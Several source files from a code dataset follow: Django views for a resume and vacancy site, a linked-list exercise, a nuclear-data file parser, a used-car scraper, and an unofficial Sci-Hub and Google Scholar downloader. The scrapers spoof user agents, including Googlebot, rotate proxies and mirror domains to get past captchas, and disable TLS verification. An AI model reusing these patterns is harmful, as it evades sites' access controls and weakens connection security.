loader\nfrom django.shortcuts import render,get_object_or_404\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Hh_vacancy, Vacancy, Responsibility, Vendors_technologies, Post,Basic\n\ndef index(request):\n vacancy_p = Hh_vacancy.objects.order_by('id')[:6]\n post = Post.objects.order_by('id')[:3]\n return render(request, 'blog/index.html', {'vacancy_p': vacancy_p,'post': post})\n\n\ndef detail(request, id):\n try:\n vacancy = Vacancy.objects.get(vacancy_id=id)\n competences = Responsibility.objects.filter(vacancy_id=id).first()\n list_competences = competences.name_list.replace('[','').replace(']','').replace(\"'\",\"\")\n list_competences = list_competences.split(',')\n list_associated = competences.associated.split(',')\n vend_tehn = Vendors_technologies.objects.filter(name__in=[associated for associated in list_associated])\n except Vacancy.DoesNotExist:\n raise Http404(\"Vacnacy does not exist\")\n return render(request, 'blog/detail.html', {'vacancy': vacancy, 'competences': list_competences , 'associated' : vend_tehn })\n\n\ndef listing(request):\n vacancy_list =Hh_vacancy.objects.all()\n paginator = Paginator(vacancy_list, 25) # Show 25 contacts per page\n page = request.GET.get('page')\n vacancy_p = paginator.get_page(page)\n return render(request, 'blog/listing.html', {'vacancy_p': vacancy_p})\n\ndef vend_teh(request, name):\n try:\n vendors_technologies = Vendors_technologies.objects.get(name=name)\n except Vendors_technologies.DoesNotExist:\n raise Http404(\"DoesNotExist\")\n return render(request, 'blog/vendor_tehn.html', {'vendors_technologies': vendors_technologies})\n\ndef post_list(request):\n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'blog/post_list.html', {'posts': posts})\n\ndef detail_post(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/detail_post.html', {'post': post})\n\ndef basic(request, pk):\n basic = get_object_or_404(Basic, pk=pk)\n return render(request, 'blog/basic_detail.html', {'basic': basic})\n\ndef vend_teh_list(request):\n posts = Vendors_technologies.objects.all()\n return render(request, 'blog/vendor_tehn_list.html', {'posts': posts})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415524262","text":"# Given a pointer to the first node in the list and a value, create a new node, assign it to the list head and return a pointer to the new head node\n\n# import the list class and node class\nimport sys\nfrom os.path import dirname, abspath\n\nmainDir = dirname(dirname(abspath(__file__)))\nsys.path.append(mainDir)\n\nfrom listNode import Node\nfrom singleList import List\n\n# import the random module\nfrom random import randrange\n\n# Create a new list and populate it\nnewSList = List()\nfor i in range(0, 10):\n newSList.add(randrange(100))\n\n# function to add given value to the beginning of the list\ndef addFront(list, head, val):\n newNode = Node(val)\n if head:\n newNode.next = head\n\n list.setHeadNode(newNode)\n list.recalculateLength()\n return list.getHeadNode()\n\n# print the existing list\nprint('The original list is {} - length is {}').format(newSList.show(), newSList.length())\n\n# add the value to the front and display results\nmyVal = 42\nprint('{}').format(addFront(newSList, newSList.getHeadNode(), myVal))\n\n# print the list after the addition\nprint('The new list is {} - length is {}').format(newSList.show(), newSList.length())\n","sub_path":"Chapter-05-Linked-Lists/SList-Add-Front/SList-Add-Front.py","file_name":"SList-Add-Front.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434453314","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport threading\nimport time\nimport json\nimport pprint\nfrom random import randint\nimport math\nimport datetime\n\ndef gen_headers():\n referers = ['tw.yahoo.com', 'www.google.com', 'http://www.msn.com/zh-tw/', 'http://www.pchome.com.tw/']\n user_agents = ['Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)']\n headers = {'user-agent': user_agents[randint(0, len(user_agents) - 1)],\n 'referer': referers[randint(0, len(referers) - 1)]}\n return headers\n\n\n# get total number of cars\ndef get_car_no(url):\n res = requests.get(url)\n js = json.loads(res.text)\n car_no = int(js['data']['total'])\n\n return car_no\n\n\n# get url and first info group(without doors, color, gasoline, equip)\ndef get_car_urls(brand_list, car_no, headers, file_out):\n\n page_no = math.ceil(car_no / 20)\n for page in range(1, page_no + 1):\n count = 0\n\n # try 3 requests\n while count < 3:\n\n try:\n url = 'https://auto.8891.com.tw/usedauto-search.html?page={}'.format(page)\n res = requests.get(url, headers=headers)\n #8891每頁的res回傳一個有20輛車的json(有12欄資訊直接由此獲得)\n js = json.loads(res.text.lower())\n data = \"\"\n for i in range(1, len(js['data']['data'].keys()) + 1):\n info = js['data']['data'][str(i)]\n if (info['auto_brand_en'].upper() in brand_list):\n carDic = {'source': '8891'}\n carDic['url'] = 'https://auto.8891.com.tw/usedauto-infos-{}.html'.format(info['id'])\n carDic['title'] = info['auto_title_all']\n carDic['brand'] = info['auto_brand_en']\n carDic['model'] = info['item_kind_name_en']\n carDic['cc'] = int(float(info['auto_gas_size'].lower().split('l')[0]) * 1000)\n carDic['transmission'] = info['auto_tab_name']\n mile_search = re.search(r'[0-9.]+', info['auto_mileage_num'])\n wen_search = re.search(r'萬', info['auto_mileage_num'])\n if mile_search:\n if wen_search:\n carDic['mileage'] = int(float(mile_search.group()) * 10000)\n else:\n carDic['mileage'] = int(float(mile_search.group()))\n else:\n carDic['mileage'] = -1\n carDic['years'] = int(re.search(r'[0-9]+', info['auto_year_type']).group())\n carDic['location'] = info['auto_address']\n date_str = info['item_post_date']\n carDic['posttime'] = int(datetime.datetime.strptime(date_str, \"%Y-%m-%d %H:%M:%S\").timestamp())\n carDic['price'] = float(info['auto_price'])\n data += \"{}|{}|{}\\n\".format(carDic['url'], carDic['posttime'],\n json.dumps(carDic, ensure_ascii=False))\n else:\n continue # jump over the car where its brand is not in our brand_list\n\n #每頁會輸出20行的data 每行的格式:\"url|posttime(string)|{已經有12欄資料的Dictionary}\"\n with open(file_out, 'a') as f:\n f.write(data)\n # progree存到csv\n with open('progress.csv', 'w') as f:\n f.write('{}\\n'.format(page))\n break # after succefully write data, break while\n except Exception as e:\n count += 1\n if count == 3:\n message = 'fail page:{},error:{}'.format(page, e)\n #exception直接印出\n print(message)\n finally:\n time.sleep(0.2)\n\nif __name__=='__main__':\n headers= gen_headers()\n car_no= get_car_no()\n brand_list = ['AUDI', 'MERCEDES-BENZ', 'BMW', 'FORD', 'HONDA', 'LEXUS', 'MAZDA', 'MITSUBISHI',\n 'NISSAN', 'PORSCHE', 'SUZUKI', 'SUBARU', 'TOYOTA', 'VOLVO', 'VOLKSWAGEN']\n fileOut='url.txt'\n\n #測試時car_no可以自己填100(只爬100輛車)\n get_car_urls(brand_list, car_no, headers, fileOut)\n","sub_path":"8891_url.py","file_name":"8891_url.py","file_ext":"py","file_size_in_byte":4805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228899821","text":"\"\"\"nushellx_lpt/parser.py\nFunctions for parsing *.lpt files and generating maps from the data\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os import sep, path, walk\n\nfrom constants import FN_PARSE_LPT_RGX_FNAME_INT as _RGX_FNAME_INT\nfrom constants import F_PARSE_INT_CMNT_STR as _INT_CMNT_STR\nfrom constants import F_PARSE_INT_CMNT_ZBT as _INT_CMNT_STR_ZBT\nfrom constants import F_PARSE_LPT_COL_START_SPE as _COL_START_SPE\nfrom constants import F_PARSE_LPT_NCOLS_STATE as _NCOLS_STATE\nfrom constants import F_PARSE_LPT_ROW_AZ as _ROW_AZ\nfrom constants import F_PARSE_LPT_ROW_SPE as _ROW_SPE\nfrom constants import F_PARSE_LPT_ROW_START_STATES as _ROW_STATES_START\nfrom constants import F_PARSE_LPT_STR_CMNT as _LPT_CMNT_STR\nfrom deprecated.int.parser import zero_body_term, zero_body_term_line\nfrom parse import content_lines, comment_lines, fraction_str_to_float\nfrom parse import matches_completely\n\n\n# EXP\ndef _a_z_line(filepath):\n \"\"\"Get the line from the *.lpt file that contains A (mass number) and\n Z (proton number)\n :param filepath: path to *.lpt file\n \"\"\"\n return list(content_lines(filepath, _LPT_CMNT_STR))[_ROW_AZ]\n\n\ndef a_z(filepath):\n \"\"\"Return A and Z from a list of lines, whose a_z_line has the format\n a = [A] z = [Z]\n :param filepath: path to the *.lpt file\n :return: A, Z\n \"\"\"\n elts = _a_z_line(filepath).split()\n return int(elts[2]), int(elts[5]) # A, Z\n\n\ndef interaction(filepath):\n \"\"\"Assumes the grandparent directory will be named according to the\n interaction(s) used to generate the *.nushellx_lpt file\n :param filepath: the path describing the *.nushellx_lpt file\n :return: the interaction name\n \"\"\"\n return filepath.split(sep)[-3]\n\n\ndef exp(filepath):\n \"\"\"Get the elements necessary to form the ExpLpt for the given filepath\n :param filepath: path to the file\n :return: the tuple representation of the ExpLpt, that is (Z, interaction)\n \"\"\"\n return (\n a_z(filepath=filepath)[1],\n str(interaction(filepath=filepath))\n )\n\n\n# OTHER\ndef _zbt_from_lpt(fpath_lpt, fname_int_regex):\n \"\"\"From the file path to a *.lpt file (and assuming the associated\n interaction file is in the same directory), gets the zero body term\n from that interaction file\n :param fpath_lpt: path to the *.lpt file\n :param fname_int_regex: regular expression that will completely\n and uniquely match the file name of the interaction file associated\n with the given *.lpt file\n \"\"\"\n dirpath = path.split(fpath_lpt)[0]\n root, dirs, files = next(walk(dirpath))\n for fname in files:\n if matches_completely(fname_int_regex, fname):\n filepath_int = path.join(root, fname)\n return zero_body_term(\n zero_body_term_line(\n cmnt_lines=comment_lines(filepath=filepath_int,\n comment_str=_INT_CMNT_STR),\n zbt_comment=_INT_CMNT_STR_ZBT\n )\n )\n else:\n return None\n\n\n# DATA\ndef _spe_line(filepath):\n \"\"\"Returns the line containing single particle energies, adding an\n extra space at the occurrence of a - sign, since the code that writes\n the file does not ensure numbers are separated by spaces for some reason\n :param filepath: path to the *.lpt file\n \"\"\"\n return list(content_lines(\n filepath=filepath, comment_str=_LPT_CMNT_STR\n ))[_ROW_SPE].replace('-', ' -')\n\n\ndef _spe_line_data(spe_line):\n \"\"\"Retrieves a list of single particle energies (and whatever follows\n them) in the SPE line\n :param spe_line: string representation of the SPE line from a *.lpt file\n \"\"\"\n return [float(hd) for hd in spe_line.split()[_COL_START_SPE:]]\n\n\ndef _state_lines(filepath):\n \"\"\"Returns a list of state lines from the given *.lpt file\n :param filepath: path to *.lpt file\n \"\"\"\n cl = list(content_lines(filepath=filepath, comment_str=_LPT_CMNT_STR))\n row0 = _ROW_STATES_START\n if len(cl) < row0 + 1:\n return list([])\n else:\n return cl[row0:]\n\n\ndef _state_line_data(state_line):\n \"\"\"Given a single state lines, returns a list of items in the line,\n in their correct data representations. (floats, ints, etc)\n :param state_line: string representation of a *.lpt state line\n \"\"\"\n state_line_data = state_line.split()\n cbl = list()\n cbl.extend([int(bl) for bl in state_line_data[0:2]])\n cbl.extend([float(bl) for bl in state_line_data[2:4]])\n cbl.extend([fraction_str_to_float(bl) for bl in state_line_data[4:6]])\n cbl.append(int(state_line_data[6]))\n if len(state_line_data) == _NCOLS_STATE:\n cbl.extend([float(state_line_data[7]), state_line_data[8]])\n else:\n cbl.extend([None, state_line_data[7]])\n return cbl\n\n\ndef _state_lines_data(state_lines):\n \"\"\"Given a list of state lines (raw string representations of the\n state lines), maps the function _state_line_data onto this list to get\n a list of states.\n :param state_lines: list of state lines, where a state line is just the\n raw string representation of a state line from a *.lpt file\n \"\"\"\n cured_body_lists = list()\n parse_errors = list()\n for row in state_lines:\n try:\n state_line_data = _state_line_data(state_line=row)\n cured_body_lists.append(state_line_data)\n except ValueError:\n parse_errors += row\n continue\n return cured_body_lists, parse_errors\n\n\n# MAPS\ndef mass_to_spe_line_data_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> list of SPE line elements,\n where the SPE line elements are just the white-space-separated values\n in the SPE line in a *.lpt file\n :param fpath_list: list of file paths to parse\n \"\"\"\n mh_map = dict()\n for f in fpath_list:\n mass = a_z(filepath=f)[0]\n mh_map[mass] = _spe_line_data(spe_line=_spe_line(filepath=f))\n return mh_map\n\n\ndef _n_to_state_data_map(state_lines_data):\n \"\"\"Returns a map from\n N (state index) -> State (list of state line data)\n where N uses the convention of the *.lpt files (beginning at 1 instead of\n 0)\n :param state_lines_data: list of state line data\n \"\"\"\n nb_map = dict()\n for cbl in state_lines_data:\n nb_map[cbl[0]] = cbl[1:]\n return nb_map\n\n\ndef mass_to_n_to_state_data_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> N (state index) -> State (list of state data)\n :param fpath_list: list of files to parse\n \"\"\"\n mnb_map = dict()\n problem_files = list()\n for f in fpath_list:\n mass = a_z(f)[0]\n state_lines_data, parse_errors = _state_lines_data(\n state_lines=_state_lines(filepath=f))\n if len(parse_errors) > 0:\n problem_files.append(f)\n nb_map = _n_to_state_data_map(state_lines_data=state_lines_data)\n mnb_map[mass] = nb_map\n if len(problem_files) > 0:\n print('Problem parsing files:')\n for pf in problem_files:\n print(' {}'.format(pf))\n return mnb_map\n\n\ndef mass_to_zbt_map(fpath_list):\n \"\"\"Returns a map\n A (mass number) -> zero body term\n :param fpath_list: list of files to parse\n \"\"\"\n d = dict()\n for fp_lpt in fpath_list:\n mass = a_z(filepath=fp_lpt)[0]\n zbt = _zbt_from_lpt(fpath_lpt=fp_lpt, fname_int_regex=_RGX_FNAME_INT)\n d[mass] = zbt\n return d\n","sub_path":"src/deprecated/nushellx_lpt/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179986969","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom django.utils import timezone\nfrom models import Question,Document,Entry\nfrom .formc import MessageForm,SearchForm\nfrom crispy_forms.layout import Field\nfrom . import forms\nfrom . import pdf2txt\nimport StringIO\nimport docx,os\n\ndef getText(filename):\n doc = docx.Document(filename)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return '\\n'.join(fullText)\n\ndef update(request, data):\n val = request.POST.get('cid', False)\n if val and val > 0:\n d = Entry.objects.get(pk=val)\n if request.FILES.get('docfile', False):\n d.upload = request.FILES['docfile']\n d.resume = data\n if request.POST.get('name', False):\n d.name = request.POST['name']\n if request.POST.get('college_score', False):\n d.college_score = request.POST['college_score']\n if request.POST.get('company_score', False):\n d.company_score = request.POST['company_score']\n if request.POST.get('company', False):\n d.company = request.POST['company']\n if request.POST.get('skill', False):\n d.skill = request.POST['skill']\n if request.POST.get('college', False):\n d.college = request.POST['college']\n d.save()\n else:\n newdoc = Entry(upload = request.FILES['docfile'],\n name = request.POST['name'],\n college_score = request.POST['college_score'],\n company_score = request.POST['company_score'],\n college = request.POST['college'],\n skill = request.POST['skill'],\n company = request.POST['company'],\n resume = data)\n newdoc.save()\n\ndef getform(request):\n finish = \"\"\n success = False\n if request.method == 'POST':\n if request.FILES.get('docfile', False):\n filename, file_extension = os.path.splitext(request.FILES['docfile'].name)\n if file_extension == \".pdf\":\n k = pdf2txt.pdf2txt(request.FILES['docfile'])\n elif file_extension == \".docx\":\n k = getText(request.FILES['docfile'])\n update(request, k)\n elif request.POST.get('cid', False):\n update(request, \"\")\n else:\n return HttpResponse(\"Invalid File Type\")\n success = True\n form = MessageForm()\n #documents = Entry.objects.filter(resume__search=\"rrrrrr\")\n return render(request, \"formc.html\", {'form':form, 'success':success,\n 'modify':False})\n\ndef formc(request):\n return render(request, 'formc.html', {'form': MessageForm()})\n\ndef search(request):\n documents = None\n form = SearchForm()\n if request.method == 'POST':\n keywords = request.POST['keywords']\n documents = Entry.objects.filter(resume__search=keywords)\n #documents = Entry.objects.filter(pk=2)\n return render(request, 'search.html', {'form': form, 'documents':documents})\n\ndef modify(request):\n p = request.POST['id']\n documents = Entry.objects.filter(pk=p)\n if documents != None:\n for v in documents:\n form = MessageForm(initial={'name': v.name, 'college': v.college, 'cid':p,\n 'company': v.company, 'skill':v.skill})\n return render(request, 'formc.html', {'form': form, 'modify': True})\n return HttpResponse(\"Data not found\")\n\ndef index(request):\n return render(request, 'index.html', {})\n\ndef list_resume(request):\n documents = Entry.objects.all()\n return render(request, 'list.html', {'documents':documents})\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270313408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSci-API Unofficial API\n- [Search|Download] research papers from [scholar.google.com|sci-hub.io].\n- find metadata of an article.\n@author Wei Wu\n\"\"\"\n\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\nfrom crossref.restful import Works\nimport re\nfrom ylib import ylog\nfrom difflib import SequenceMatcher\nfrom ylib.yaml_config import Configuraion\nfrom urllib.parse import quote_plus\nfrom ylib.preprocessing import strip_punctuation\nconfig = Configuraion()\n\nconfig.load('/home/weiwu/projects/deep_learning/web_crawl/config.yaml')\nUSER_AGENT = config.USER_AGENT\nDOMAIN = config.DOMAIN\nBLACK_DOMAIN = config.BLACK_DOMAIN\nURL_SEARCH = config.URL_GOOGLE_SEARCH\nPROXIES = config.PROXIES\nURL_SEARCH = config.URL_GOOGLE_SCHOLAR\nURL_NEXT = config.URL_GOOGLE_SCHOLAR_NEXT\n\nylog.set_level(logging.DEBUG)\nylog.console_on()\nylog.filelog_on(\"app\")\n\n# log config\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\nlogger = logging.getLogger('Sci-Hub')\nlogger.setLevel(logging.DEBUG)\n\n# constants\nSCIHUB_BASE_URL = 'http://sci-hub.cc/'\nSCHOLARS_BASE_URL = 'https://scholar.google.com/scholar'\nHEADERS = {\n 'User-Agent':\n 'Mozilla/5.0 (X11; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0'\n}\nAVAILABLE_SCIHUB_BASE_URL = [\n 'sci-hub.tw', 'sci-hub.hk', 'sci-hub.la', 'sci-hub.mn', 'sci-hub.name',\n 'sci-hub.is', 'sci-hub.tv'\n 'sci-hub.ws'\n 'www.sci-hub.cn'\n 'sci-hub.sci-hub.hk', 'sci-hub.sci-hub.tw', 'sci-hub.sci-hub.mn',\n 'sci-hub.sci-hub.tv', 'tree.sci-hub.la'\n]\n\n\nclass SciHub(object):\n \"\"\"\n SciHub class can search for papers on Google Scholars\n and fetch/download papers from sci-hub.io\n \"\"\"\n\n def __init__(self):\n requests.packages.urllib3.disable_warnings(\n requests.packages.urllib3.exceptions.InsecureRequestWarning)\n self.sess = requests.Session()\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n self.available_base_url_list = AVAILABLE_SCIHUB_BASE_URL\n self.base_url = 'http://' + self.available_base_url_list[0] + '/'\n self.works = Works()\n self.sess.proxies = PROXIES\n self.re_bracket = re.compile(\"\\[(.*?)\\]\\s\")\n\n def get_random_user_agent(self):\n return random.choice(self.read_file('user_agents.txt', USER_AGENT))\n\n def get_random_domain(self):\n domain = random.choice(self.read_file('all_domain.txt', DOMAIN))\n if domain in BLACK_DOMAIN:\n self.get_random_domain()\n else:\n return domain\n\n def read_file(self, filename, default=''):\n # root_folder = os.path.dirname(__file__)\n root_folder = os.getcwd()\n user_agents_file = os.path.join(\n os.path.join(root_folder, 'data'), filename)\n try:\n with open(user_agents_file) as fp:\n data = [_.strip() for _ in fp.readlines()]\n except:\n data = [default]\n return data\n\n def set_proxy(self, proxy):\n '''\n set proxy for session\n :param proxy_dict:\n :return:\n '''\n # if proxy:\n # self.sess.proxies = {\n # \"http\": proxy,\n # \"https\": proxy,\n # }\n self.sess.proxies = PROXIES\n\n @retry(\n wait_random_min=200, wait_random_max=2000, stop_max_attempt_number=10)\n def find_meta(self, identifier):\n \"\"\" find metadata with title or DOI\n Keyword Arguments:\n identifier --\n \"\"\"\n try:\n # verify=False is dangerous but sci-hub.io\n # requires intermediate certificates to verify\n # and requests doesn't know how to download them.\n # as a hacky fix, you can add them to your store\n # and verifying would work. will fix this later.\n url = self.base_url + identifier['article_link']\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(url, verify=False, allow_redirects=False)\n re_bracket = re.compile(\"\\[(.*?)\\]\\s\")\n title = re.sub(re_bracket, \"\", identifier['name'])\n ylog.debug('*' * 80)\n ylog.debug(\"title: %s\" % title)\n ylog.debug(res.status_code)\n # self.out.ix[title]['status_code'] = res.status_code\n ylog.debug(\"headers: %s\" % res.headers['Content-Type'])\n ylog.debug('location: %s' % res.headers.get(\"Location\"))\n # self.out.ix[title]['location'] = res.headers.get(\"Location\")\n search_title = True\n if not res.headers.get(\"Location\"):\n content = res.content\n if len(content) > 2:\n import cchardet\n charset = cchardet.detect(content)\n text = content.decode(charset['encoding'])\n soup = BeautifulSoup(text, \"lxml\")\n script = soup.script.get_text()\n doi_regexp = '10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?![\"&\\'<>])\\S)+'\n try:\n doi_match = re.compile(doi_regexp).findall(script)[0]\n ylog.info(\"DOI: %s\" % doi_match)\n search_title = False\n # use crossref API to get metadata\n works = Works()\n w1 = works.query(doi_match).sort('relevance').order(\n 'desc')\n i = 0\n for item in w1:\n # TODO: verify title\n # self.out.ix[title]['DOI'] = item['DOI']\n return item\n# return {'meta': item['DOI'], 'url': url}\n except IndexError:\n ylog.debug('failed to find regexp')\n elif search_title:\n works = Works()\n w1 = works.query(title).sort('relevance').order('desc')\n i = 0\n for item in w1:\n i = i + 1\n try:\n # ylog.debug('crossref item title ')\n t = item.get('title')[0]\n # ylog.debug(t)\n sub_title = item.get('subtitle')[0]\n # ylog.debug(sub_title)\n # ylog.debug(\"ratio: %s\" %\n # (SequenceMatcher(a=title, b=t).ratio()))\n except TypeError:\n sub_title = ''\n if SequenceMatcher(\n a=title, b=t).ratio() > 0.9 or SequenceMatcher(\n a=title, b=sub_title).ratio(\n ) > 0.9 or t.startswith(title):\n ylog.debug(\"DOI %s\" % item['DOI'])\n # self.out.ix[title]['DOI'] = item['DOI']\n return item\n\n\n# return {'meta': item['DOI'], 'url': url}\n if i > 18:\n # ylog.debug('[x]%s' % title)\n # ylog.debug(item['title'])\n return None\n\n except requests.exceptions.ConnectionError:\n logger.info('{} cannot acess,changing'.format(\n self.available_base_url_list[0]))\n self._change_base_url()\n\n except requests.exceptions.RequestException as e:\n\n return {\n 'err':\n 'Failed to fetch pdf with identifier %s (resolved url %s) due to request exception.'\n % (identifier, url)\n }\n\n def _change_base_url(self):\n del self.available_base_url_list[0]\n self.base_url = 'http://' + self.available_base_url_list[0] + '/'\n logger.info(\n \"I'm changing to {}\".format(self.available_base_url_list[0]))\n\n def req_url(self, query, language=None, start=0, pause=2):\n # domain = ''\n domain = self.get_random_domain()\n if start > 0:\n url = URL_NEXT\n url = url.format(\n domain=domain, query=quote_plus(query), start=start)\n else:\n\n url = URL_SEARCH\n url = url.format(\n domain=domain, query=quote_plus(query), language=language)\n return url\n\n def search(self, query, limit=10, download=False):\n \"\"\"\n Performs a query on scholar.google.com, and returns a dictionary\n of results in the form {'papers': ...}. Unfortunately, as of now,\n captchas can potentially prevent searches after a certain limit.\n \"\"\"\n start = 0\n results = {'papers': []}\n\n while True:\n try:\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(\n SCHOLARS_BASE_URL,\n allow_redirects=True,\n params={\n 'q': query,\n 'hl': 'en',\n 'start': start,\n 'as_sdt': '0,5'\n })\n ylog.debug(res.url)\n except requests.exceptions.RequestException as e:\n results[\n 'err'] = 'Failed to complete search with query %s (connection error)' % query\n return results\n\n s = self._get_soup(res.content)\n papers = s.find_all('div', class_=\"gs_r\")\n\n if not papers:\n if 'CaptchaRedirect' in res.content:\n results[\n 'err'] = 'Failed to complete search with query %s (captcha)' % query\n return results\n\n for paper in papers:\n if not paper.find('table'):\n source = None\n pdf = paper.find('div', class_='gs_ggs gs_fl')\n link = paper.find('h3', class_='gs_rt')\n # find link type,\n try:\n url_type = paper.find(\n 'span', class_='gs_ctg2').get_text()[1:-1]\n except:\n url_type = None\n\n if pdf:\n source = pdf.find('a')['href']\n elif link.find('a'):\n source = link.find('a')['href']\n else:\n continue\n article_link = link.find('a')['href']\n title = link.text.replace(\"\\xa0…\", \"\")\n title = re.sub(self.re_bracket, \"\", title)\n title = strip_punctuation(title)\n results['papers'].append({\n 'name': title,\n 'url': source,\n 'article_link': article_link,\n 'type': url_type\n })\n\n if len(results['papers']) >= limit:\n return results\n\n start += 10\n\n @retry(\n wait_random_min=100, wait_random_max=1000, stop_max_attempt_number=10)\n def download(self, identifier, destination='', path=None):\n \"\"\"\n Downloads a paper from sci-hub given an indentifier (DOI, PMID, URL).\n Currently, this can potentially be blocked by a captcha if a certain\n limit has been reached.\n \"\"\"\n data = self.fetch(identifier)\n\n if not 'err' in data:\n self._save(\n data['pdf'],\n os.path.join(\n destination, path if path else\n data['name'].encode('utf-8').decode('utf-8').strip()))\n\n return data\n\n def fetch(self, identifier):\n \"\"\"\n Fetches the paper by first retrieving the direct link to the pdf.\n If the indentifier is a DOI, PMID, or URL pay-wall, then use Sci-Hub\n to access and download paper. Otherwise, just download paper directly.\n \"\"\"\n if identifier['type'] == 'PDF':\n url = identifier['url']\n else:\n url = self._get_direct_url(identifier['url'])\n\n try:\n # verify=False is dangerous but sci-hub.io\n # requires intermediate certificates to verify\n # and requests doesn't know how to download them.\n # as a hacky fix, you can add them to your store\n # and verifying would work. will fix this later.\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(url, verify=False)\n\n if res.headers['Content-Type'] != 'application/pdf':\n self._change_base_url()\n raise CaptchaNeedException(\n 'Failed to fetch pdf with identifier %s '\n '(resolved url %s) due to captcha' % (identifier, url))\n # return {\n # 'err': 'Failed to fetch pdf with identifier %s (resolved url %s) due to captcha'\n # % (identifier, url)\n # }\n else:\n return {\n 'pdf': res.content,\n 'url': url,\n 'name': identifier['name'] + '.pdf'\n # 'name': self._generate_name(res)\n }\n\n except requests.exceptions.ConnectionError:\n logger.info('{} cannot acess,changing'.format(\n self.available_base_url_list[0]))\n self._change_base_url()\n\n except requests.exceptions.RequestException as e:\n\n return {\n 'err':\n 'Failed to fetch pdf with identifier %s (resolved url %s) due to request exception.'\n % (identifier, url)\n }\n\n def _get_direct_url(self, identifier):\n \"\"\"\n Finds the direct source url for a given identifier.\n \"\"\"\n id_type = self._classify(identifier)\n\n return identifier if id_type == 'url-direct' \\\n else self._search_direct_url(identifier)\n\n def _search_direct_url(self, identifier):\n \"\"\"\n Sci-Hub embeds papers in an iframe. This function finds the actual\n source url which looks something like https://moscow.sci-hub.io/.../....pdf.\n \"\"\"\n self.sess.headers = {'user-agent': self.get_random_user_agent()}\n res = self.sess.get(self.base_url + identifier, verify=False)\n s = self._get_soup(res.content)\n iframe = s.find('iframe')\n if iframe:\n return iframe.get('src') if not iframe.get('src').startswith('//') \\\n else 'http:' + iframe.get('src')\n\n def _classify(self, identifier):\n \"\"\"\n Classify the type of identifier:\n url-direct - openly accessible paper\n url-non-direct - pay-walled paper\n pmid - PubMed ID\n doi - digital object identifier\n \"\"\"\n if (identifier.startswith('http') or identifier.startswith('https')):\n if identifier.endswith('pdf'):\n return 'url-direct'\n else:\n return 'url-non-direct'\n elif identifier.isdigit():\n return 'pmid'\n else:\n return 'doi'\n\n def _save(self, data, path):\n \"\"\"\n Save a file give data and a path.\n \"\"\"\n with open(path, 'wb') as f:\n f.write(data)\n\n def _get_soup(self, html):\n \"\"\"\n Return html soup.\n \"\"\"\n return BeautifulSoup(html, 'html.parser')\n\n def _generate_name(self, res):\n \"\"\"\n Generate unique filename for paper. Returns a name by calcuating\n md5 hash of file contents, then appending the last 20 characters\n of the url which typically provides a good paper identifier.\n \"\"\"\n name = res.url.split('/')[-1]\n pdf_hash = hashlib.md5(res.content).hexdigest()\n return '%s-%s' % (pdf_hash, name[-20:])\n\n\nclass CaptchaNeedException(Exception):\n pass\n\n\ndef main():\n sh = SciHub()\n\n parser = argparse.ArgumentParser(\n description='SciHub - To remove all barriers in the way of science.')\n parser.add_argument(\n '-d',\n '--download',\n metavar='(DOI|PMID|URL)',\n help='tries to find and download the paper',\n type=str)\n parser.add_argument(\n '-f',\n '--file',\n metavar='path',\n help='pass file with list of identifiers and download each',\n type=str)\n parser.add_argument(\n '-s',\n '--search',\n metavar='query',\n help='search Google Scholars',\n type=str)\n parser.add_argument(\n '-sd',\n '--search_download',\n metavar='query',\n help='search Google Scholars and download if possible',\n type=str)\n parser.add_argument(\n '-l',\n '--limit',\n metavar='N',\n help='the number of search results to limit to',\n default=10,\n type=int)\n parser.add_argument(\n '-o',\n '--output',\n metavar='path',\n help='directory to store papers',\n default='',\n type=str)\n parser.add_argument(\n '-v',\n '--verbose',\n help='increase output verbosity',\n action='store_true')\n parser.add_argument(\n '-p',\n '--proxy',\n help='via proxy format like socks5://user:pass@host:port',\n action='store',\n type=str)\n\n args = parser.parse_args()\n\n if args.verbose:\n logger.setLevel(logging.DEBUG)\n if args.proxy:\n sh.set_proxy(args.proxy)\n\n if args.download:\n result = sh.download(args.download, args.output)\n if 'err' in result:\n 